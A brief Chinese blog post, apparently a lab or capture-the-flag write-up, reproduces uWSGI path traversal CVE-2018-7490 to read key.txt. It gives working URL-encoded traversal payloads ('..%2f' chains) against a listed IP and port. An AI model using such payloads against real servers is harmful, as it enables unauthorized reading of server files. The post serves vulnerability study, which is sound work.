uWSGI 漏洞复现（CVE-2018-7490）

uWSGI是一个Web服务器，它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器（如nginx，uWSGI等服务器）与web应用（如用Flask框架写的程序）通信的一种规范。

目标：

了解uWSGI CVE-2018-7490漏洞形成原理和漏洞利用方法。

利用搜索工具了解CVE-2018-7490漏洞详情。再利用漏洞获取根目录key.txt的值。

解析思路
http://219.153.49.228:48001/..%2f..%2fkey.txt
.. 表示上一级
%2f表示/

在IP后面输入： ..%2f..%2f..%2f..%2f..%2f..%2f..%2fkey.txt

posted @ 2019-10-22 16:10 暮日温柔阅读(3330) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

uWSGI 漏洞复现（CVE-2018-7490）

公告